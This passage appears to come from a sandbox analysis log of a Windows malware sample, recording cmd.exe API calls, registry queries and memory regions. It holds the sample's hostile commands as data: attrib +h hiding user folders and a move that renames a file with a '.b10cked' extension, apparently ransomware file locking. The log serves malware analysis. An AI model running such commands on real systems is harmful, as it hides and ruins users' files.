lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.999] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.999] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.999] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.999] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0217.025] FindClose (in: hFindFile=0x40e5e8 | out: hFindFile=0x40e5e8) returned 1 [0217.025] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0217.026] _close (_FileHandle=3) returned 0 [0217.026] GetConsoleTitleW (in: lpConsoleTitle=0x2cf490, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.026] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0217.026] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.026] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.027] FindClose (in: hFindFile=0x40e5e8 | out: hFindFile=0x40e5e8) returned 1 [0217.027] FindClose (in: hFindFile=0x40e5e8 | out: hFindFile=0x40e5e8) returned 1 [0217.027] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0217.027] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0217.027] GetConsoleTitleW (in: lpConsoleTitle=0x2cf224, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.027] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf0ac, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf174 | out: lpAttributeList=0x2cf0ac, lpSize=0x2cf174) returned 1 [0217.027] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf0ac, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf16c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf0ac, lpPreviousValue=0x0) returned 1 [0217.027] GetStartupInfoW (in: lpStartupInfo=0x2cf068 | out: lpStartupInfo=0x2cf068*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0217.027] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0217.027] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf108*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf154 | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" ", lpProcessInformation=0x2cf154*(hProcess=0x4c, hThread=0x50, dwProcessId=0xc6c, dwThreadId=0xbb4)) returned 1 [0217.029] CloseHandle (hObject=0x50) returned 1 [0217.029] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0217.029] GetEnvironmentStringsW () returned 0x412c70* [0217.029] FreeEnvironmentStringsW (penv=0x412c70) returned 1 [0217.029] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0217.075] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2cf048 | out: lpExitCode=0x2cf048*=0x0) returned 1 [0217.075] CloseHandle (hObject=0x4c) returned 1 [0217.075] _vsnwprintf (in: _Buffer=0x2cf190, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf054 | out: _Buffer="00000000") returned 8 [0217.075] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0217.075] GetEnvironmentStringsW () returned 0x412c70* [0217.075] FreeEnvironmentStringsW (penv=0x412c70) returned 1 [0217.075] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0217.076] GetEnvironmentStringsW () returned 0x412c70* [0217.076] FreeEnvironmentStringsW (penv=0x412c70) returned 1 [0217.076] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf0ac | out: lpAttributeList=0x2cf0ac) [0217.076] GetConsoleTitleW (in: lpConsoleTitle=0x2cf490, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.076] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0217.076] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.076] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.077] FindClose (in: hFindFile=0x40e5e8 | out: hFindFile=0x40e5e8) returned 1 [0217.077] FindClose (in: hFindFile=0x40e5e8 | out: hFindFile=0x40e5e8) returned 1 [0217.077] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0217.077] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0217.077] GetConsoleTitleW (in: lpConsoleTitle=0x2cf224, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.077] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf0ac, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf174 | out: lpAttributeList=0x2cf0ac, lpSize=0x2cf174) returned 1 [0217.077] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf0ac, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf16c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf0ac, lpPreviousValue=0x0) returned 1 [0217.077] GetStartupInfoW (in: lpStartupInfo=0x2cf068 | out: lpStartupInfo=0x2cf068*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0217.077] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0217.077] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\Searches\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf108*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\Searches\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf154 | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\Searches\"", lpProcessInformation=0x2cf154*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc74, dwThreadId=0x6d8)) returned 1 [0217.080] CloseHandle (hObject=0x4c) returned 1 [0217.080] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0217.080] GetEnvironmentStringsW () returned 0x413628* [0217.080] FreeEnvironmentStringsW (penv=0x413628) returned 1 [0217.080] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0217.120] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cf048 | out: lpExitCode=0x2cf048*=0x0) returned 1 [0217.120] CloseHandle (hObject=0x50) returned 1 [0217.120] _vsnwprintf (in: _Buffer=0x2cf190, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf054 | out: _Buffer="00000000") returned 8 [0217.120] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0217.120] GetEnvironmentStringsW () returned 0x413628* [0217.121] FreeEnvironmentStringsW (penv=0x413628) returned 1 [0217.121] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0217.121] GetEnvironmentStringsW () returned 0x413628* [0217.121] FreeEnvironmentStringsW (penv=0x413628) returned 1 [0217.121] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf0ac | out: lpAttributeList=0x2cf0ac) [0217.121] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.121] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0217.121] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.121] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3741ac | out: lpMode=0x4a3741ac) returned 1 [0217.121] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.121] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3741b0 | out: lpMode=0x4a3741b0) returned 1 [0217.121] SetConsoleInputExeNameW () returned 0x1 [0217.121] GetConsoleOutputCP () returned 0x1b5 [0217.121] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0217.121] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.122] exit (_Code=0) Process: id = "550" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0xc0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\EVERYW~1.SEA\" \"C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32187 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32188 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32189 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32190 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 32191 start_va = 0x4a350000 end_va = 0x4a39bfff entry_point = 0x4a350000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32192 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32193 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32194 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32195 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32196 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32217 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32218 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32219 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 32220 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 32221 start_va = 0x2c0000 end_va = 0x326fff entry_point = 0x2c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32222 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32223 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32224 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32225 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32226 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32227 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32228 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32229 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32230 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32231 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 32232 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32233 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32234 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 32235 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 32236 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 32237 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 32238 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 32239 start_va = 0x510000 end_va = 0x110ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 32240 start_va = 0x1110000 end_va = 0x1272fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001110000" filename = "" Thread: id = 752 os_tid = 0xcb8 [0216.561] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fb94 | out: lpSystemTimeAsFileTime=0x16fb94*(dwLowDateTime=0xb5e18f00, dwHighDateTime=0x1d440a9)) [0216.561] GetCurrentProcessId () returned 0xc0c [0216.561] GetCurrentThreadId () returned 0xcb8 [0216.561] GetTickCount () returned 0x3c937 [0216.561] QueryPerformanceCounter (in: lpPerformanceCount=0x16fb8c | out: lpPerformanceCount=0x16fb8c*=27334993220) returned 1 [0216.561] GetModuleHandleA (lpModuleName=0x0) returned 0x4a350000 [0216.561] __set_app_type (_Type=0x1) [0216.561] __p__fmode () returned 0x76b331f4 [0216.561] __p__commode () returned 0x76b331fc [0216.561] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a3721a6) returned 0x0 [0216.562] __getmainargs (in: _Argc=0x4a374238, _Argv=0x4a374240, _Env=0x4a37423c, _DoWildCard=0, _StartInfo=0x4a374140 | out: _Argc=0x4a374238, _Argv=0x4a374240, _Env=0x4a37423c) returned 0 [0216.562] GetCurrentThreadId () returned 0xcb8 [0216.562] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcb8) returned 0x38 [0216.562] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0216.562] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0216.562] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.562] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0216.562] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fb24 | out: phkResult=0x16fb24*=0x0) returned 0x2 [0216.562] VirtualQuery (in: lpAddress=0x16fb5b, lpBuffer=0x16faf4, dwLength=0x1c | out: lpBuffer=0x16faf4*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.562] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16faf4, dwLength=0x1c | out: lpBuffer=0x16faf4*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0216.562] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16faf4, dwLength=0x1c | out: lpBuffer=0x16faf4*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0216.562] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16faf4, dwLength=0x1c | out: lpBuffer=0x16faf4*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.562] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16faf4, dwLength=0x1c | out: lpBuffer=0x16faf4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.562] GetConsoleOutputCP () returned 0x1b5 [0216.562] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0216.563] SetConsoleCtrlHandler (HandlerRoutine=0x4a36e72a, Add=1) returned 1 [0216.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.563] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0216.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.563] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3741ac | out: lpMode=0x4a3741ac) returned 1 [0216.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.563] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0216.563] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.563] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3741b0 | out: lpMode=0x4a3741b0) returned 1 [0216.563] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.563] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0216.563] GetEnvironmentStringsW () returned 0x1d0178* [0216.564] FreeEnvironmentStringsW (penv=0x1d0178) returned 1 [0216.564] GetEnvironmentStringsW () returned 0x1d0178* [0216.564] FreeEnvironmentStringsW (penv=0x1d0178) returned 1 [0216.564] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ea94 | out: phkResult=0x16ea94*=0x40) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x0, lpData=0x16eaa0*=0xa0, lpcbData=0x16ea98*=0x1000) returned 0x2 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x4, lpData=0x16eaa0*=0x1, lpcbData=0x16ea98*=0x4) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x0, lpData=0x16eaa0*=0x1, lpcbData=0x16ea98*=0x1000) returned 0x2 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x4, lpData=0x16eaa0*=0x0, lpcbData=0x16ea98*=0x4) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x4, lpData=0x16eaa0*=0x40, lpcbData=0x16ea98*=0x4) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x4, lpData=0x16eaa0*=0x40, lpcbData=0x16ea98*=0x4) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x0, lpData=0x16eaa0*=0x40, lpcbData=0x16ea98*=0x1000) returned 0x2 [0216.564] RegCloseKey (hKey=0x40) returned 0x0 [0216.564] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ea94 | out: phkResult=0x16ea94*=0x40) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x0, lpData=0x16eaa0*=0x40, lpcbData=0x16ea98*=0x1000) returned 0x2 